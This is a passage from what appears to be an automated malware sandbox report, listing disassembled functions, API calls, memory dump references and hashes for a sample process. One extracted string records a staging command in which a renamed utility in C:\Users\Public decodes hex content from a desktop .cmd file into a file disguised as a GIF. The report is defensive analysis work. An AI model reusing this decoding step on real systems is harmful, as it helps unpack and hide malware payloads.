                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Concurrency::cancel_current_taskmalloc
                                              • String ID:
                                              • API String ID: 1412018758-0
                                              • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                              • Instruction ID: 50b66114867919fc727482d5108bdc2b52a4a2479dbcef179588dd518c8f75d6
                                              • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                              • Instruction Fuzzy Hash: E4E09213F1A70796FE152B6268413F812447F1C7A8F482430DD1DC93A2EE2EB195875A
                                              Function 00007FF6EB17CD90 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                              • Instruction ID: 2a64165f4bdbdffcbaa8c868504c75ad082d581b270d40ca8e82853bc3a3922d
                                              • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                              • Instruction Fuzzy Hash: 37F03133A18642C6EB448B55F9902B8F7A1FB8DB54B589434D90E83364DF3DE485C705
                                              Function 00007FF6EB184C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: exit
                                              • String ID:
                                              • API String ID: 2483651598-0
                                              • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                              • Instruction ID: f1933bb0ff546ae3d5cdf54de63c1469da23ffe4a15a48afbd0bcb51a24259db
                                              • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                              • Instruction Fuzzy Hash: 4BC0803270464687EB1C673135512BD55597F0D325F04543CC50BC12F1DF2DD4088609
                                              Function 00007FF6EB185508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF6EB176F97), ref: 00007FF6EB18550C
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: DefaultLangUser
                                              • String ID:
                                              • API String ID: 768647712-0
                                              • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                              • Instruction ID: 3fa9d2c147a3e2985a32abcfdb9587537ac3d7fc979011ad34423492a8e25a0c
                                              • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                              • Instruction Fuzzy Hash: 52E012E3E082538AF5542A4164853F85953EB6F7B7FC44031C60D956E55D2F6841560E
                                              Function 00007FF6EB182E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset
                                              • String ID:
                                              • API String ID: 2221118986-0
                                              • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                              • Instruction ID: 1bc13282e995fa1d41f40da5b7b34278aaf352207f34ef7ac2cc64d36ada8f4d
                                              • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                              • Instruction Fuzzy Hash: 4FF0E922B0978140EA508757B5402A95290AF8CBF4F088330EF7D87BE5DE3CD451C705

                                              Non-executed Functions

                                              Function 00007FF6EB17B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _get_osfhandlememset$wcschr
                                              • String ID: DPATH
                                              • API String ID: 3260997497-2010427443
                                              • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                              • Instruction ID: 94c8c32f737233536db5eeb305ed038b14589eea5bb99206ab3239eba5ff7847
                                              • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                              • Instruction Fuzzy Hash: 8ED1AC23A0865282EA219B25D4503FE62A1FF4DBACF044235DA1D877F4DF3EE845874A
                                              Function 00007FF6EB19AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseValue$CreateDeleteOpen
                                              • String ID: %s=%s$\Shell\Open\Command
                                              • API String ID: 4081037667-3301834661
                                              • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                              • Instruction ID: b9794d8e301b8b657e17d8edcfd6b70009e6934b85876d0897bf7795bc02ab57
                                              • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                              • Instruction Fuzzy Hash: E771D623B19B8282EB508B55E0503F9A2A1FF8DBA8F444131DE4E877E4DF3EE5498745
                                              Function 00007FF6EB171884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmpwcsrchr
                                              • String ID: COPYCMD
                                              • API String ID: 2429825313-3727491224
                                              • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                              • Instruction ID: e4d14422dbae43b58e2ff61188029cf241e5834e9c21ec7d040f014ca5932364
                                              • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                              • Instruction Fuzzy Hash: A8F18223F0865286FB608F51D0443FD32A1AB0DBACF004239DE5DA36E8DE7EA555C74A
                                              Function 00007FF6EB19BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                              • String ID:
                                              • API String ID: 3476366620-0
                                              • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                              • Instruction ID: 044b85cc3b8463fa12efd68c7a85612ad2143e10a661273542f52440968bbfe0
                                              • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                              • Instruction Fuzzy Hash: AC212122908A4396EA146B20A9553F96791FF8DB7DF845235C51EC22F5DF3EB408C60A
                                              Function 00007FF6EB179B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                              • Instruction ID: 084b3e392a0110682bfcd6b17ba879100b43ce34f1347259e072acee626457cb
                                              • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                              • Instruction Fuzzy Hash: F0A1DF33A1865282EA509B25E4517FA62A1FF8DBA8F404035DE4EC37F4DF7EE405874A
                                              Function 00007FF6EB17F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF6EB17F52A,00000000,00000000,?,00000000,?,00007FF6EB17E626,?,?,00000000,00007FF6EB181F69), ref: 00007FF6EB17F8DE
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F8FB
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F951
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F96B
                                              • wcschr.MSVCRT ref: 00007FF6EB17FA8E
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB17FB14
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17FB2D
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17FBEA
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB17F996
                                                • Part of subcall function 00007FF6EB180010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6EB19849D,?,?,?,00007FF6EB19F0C7), ref: 00007FF6EB180045
                                                • Part of subcall function 00007FF6EB180010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6EB19F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB180071
                                                • Part of subcall function 00007FF6EB180010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB180092
                                                • Part of subcall function 00007FF6EB180010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB1800A7
                                                • Part of subcall function 00007FF6EB180010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB180181
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D401
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D41B
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D435
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D480
                                              Strings
                                              • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 , xrefs: 00007FF6EB17F90E
                                              • =,;, xrefs: 00007FF6EB17F8C8
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                              • String ID: =,;$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
                                              • API String ID: 3964947564-1196249360
                                              • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                              • Instruction ID: e3cf2f185c7aeac820c7151aa2e652254ab392fcafdac13b668b4bb15dcd0551
                                              • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                              • Instruction Fuzzy Hash: 4F025923A19792C6EA149B20E8943F967A1BF4D7B8F544135D94EC37F8DF3EA404C60A
                                              Function 00007FF6EB17EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswdigitiswspacewcschr
                                              • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                              • API String ID: 1595556998-2755026540
                                              • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                              • Instruction ID: c5ae9f056403839dc0dba38e6003b6fa5dd7f7b4a5f6057837c7f2dba6593746
                                              • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                              • Instruction Fuzzy Hash: 22227A67D0C6E2C1FA615B15E4903FA27A0BF0E7B8F504136D98DC32F8DF6EA445861A
                                              Function 00007FF6EB17D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                              • String ID: "$=,;
                                              • API String ID: 3545743878-4143597401
                                              • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                              • Instruction ID: dd9e04ad987cd3a98581e53fdcb9fb8e896325d92db245ebfa6d6ff81805ba94
                                              • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                              • Instruction Fuzzy Hash: 61C1C6A3A0866682EB255B11D4003F976A1FF4EF6CF058035DA4E933E4EF7EA445C70A
                                              Function 00007FF6EB195BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CurrentFormatMessageThread
                                              • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                              • API String ID: 2411632146-3173542853
                                              • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                              • Instruction ID: 14ee8fa28340d204cb46e4895469d77c123a59b8ea8502cb1c70ca38d55ef854
                                              • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
